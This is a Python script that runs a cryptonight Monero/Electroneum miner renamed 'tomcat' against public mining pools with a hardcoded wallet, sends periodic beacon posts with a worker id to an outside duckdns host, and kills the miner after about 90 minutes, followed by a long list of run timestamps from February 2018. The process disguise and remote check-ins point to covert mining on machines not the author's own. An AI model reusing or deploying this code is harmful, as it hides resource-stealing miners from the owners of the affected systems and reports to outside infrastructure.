import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:07.259667
#2018-02-17 16:03:03.828607
#2018-02-17 17:51:04.030436
#2018-02-17 19:38:07.997889
#2018-02-17 21:26:05.333976
#2018-02-17 23:10:04.680505
#2018-02-18 00:57:03.975407
#2018-02-18 02:45:01.640328
#2018-02-18 04:35:04.121139
#2018-02-18 06:26:03.736958
#2018-02-18 08:15:03.123974
#2018-02-18 10:03:01.454531
#2018-02-18 11:49:06.684827
#2018-02-18 13:34:07.118023
#2018-02-18 15:24:01.992788
#2018-02-18 17:12:06.647034
#2018-02-18 19:00:10.787102
#2018-02-18 20:47:05.941463
#2018-02-18 22:33:01.488106
#2018-02-19 00:21:04.775461
#2018-02-19 02:07:03.606581
#2018-02-19 03:54:06.517085
#2018-02-19 05:39:01.946221
#2018-02-19 07:27:03.302174
#2018-02-19 09:17:06.055826
#2018-02-19 11:06:09.743963
#2018-02-19 12:53:08.526099
#2018-02-19 14:41:07.480520
#2018-02-19 16:31:05.588970
#2018-02-19 18:17:01.917907
#2018-02-19 20:03:07.331782
#2018-02-19 21:52:05.452223
#2018-02-19 23:38:01.270145
#2018-02-20 01:23:02.140077
#2018-02-20 03:12:07.798281
#2018-02-20 05:00:08.313043
#2018-02-20 06:44:07.447141
#2018-02-20 08:29:08.350049
#2018-02-20 10:14:07.617439
#2018-02-20 11:58:07.597555
#2018-02-20 13:46:01.723847
#2018-02-20 15:29:02.165750
#2018-02-20 17:14:05.867874
#2018-02-20 19:05:02.149533
#2018-02-20 20:53:01.990863
#2018-02-20 22:37:04.749018
#2018-02-21 00:18:08.148832
#2018-02-21 02:04:01.305004
#2018-02-21 03:51:05.077606
#2018-02-21 05:38:03.786351
#2018-02-21 07:27:01.788509
#2018-02-21 09:11:05.691247
#2018-02-21 10:59:08.258648
#2018-02-21 12:44:01.455918
#2018-02-21 14:33:07.257625
#2018-02-21 16:20:01.695365
#2018-02-21 18:09:06.216447
#2018-02-21 19:56:07.185109
#2018-02-21 21:43:01.758735
#2018-02-21 23:29:02.200110
#2018-02-22 01:17:01.996743
#2018-02-22 03:07:06.495930
#2018-02-22 04:52:03.939478
#2018-02-22 06:37:01.883643
#2018-02-22 08:26:04.157736
#2018-02-22 10:13:04.792394
#2018-02-22 11:59:05.213802
#2018-02-22 13:44:06.542672
#2018-02-22 15:33:06.676423
#2018-02-22 17:18:09.240480
#2018-02-22 19:05:05.275225
#2018-02-22 20:56:07.360705
#2018-02-22 22:42:08.424655
#2018-02-23 00:29:01.950147
#2018-02-23 02:16:04.045412
#2018-02-23 04:05:05.875940
#2018-02-23 05:50:07.203410
#2018-02-23 07:41:01.390848
#2018-02-23 09:46:08.547421
#2018-02-23 11:51:08.498150
#2018-02-23 13:41:04.198148
#2018-02-23 15:29:05.163833
#2018-02-23 17:18:06.223260
#2018-02-23 19:07:06.008376
#2018-02-23 20:52:08.025978
#2018-02-23 22:39:03.549704
#2018-02-24 00:26:06.401013
#2018-02-24 02:17:05.545763
#2018-02-24 04:07:03.943919
#2018-02-24 05:53:06.872954
#2018-02-24 07:43:05.860738
#2018-02-24 09:28:06.562846
#2018-02-24 11:21:07.104384
#2018-02-24 13:11:01.505357
#2018-02-24 15:01:04.921956
#2018-02-24 16:51:04.052344
#2018-02-24 18:39:01.434306
#2018-02-24 20:27:01.626172
#2018-02-24 22:22:06.380832
#2018-02-25 01:29:05.087178
#2018-02-25 04:28:01.359098
#2018-02-25 08:06:02.127722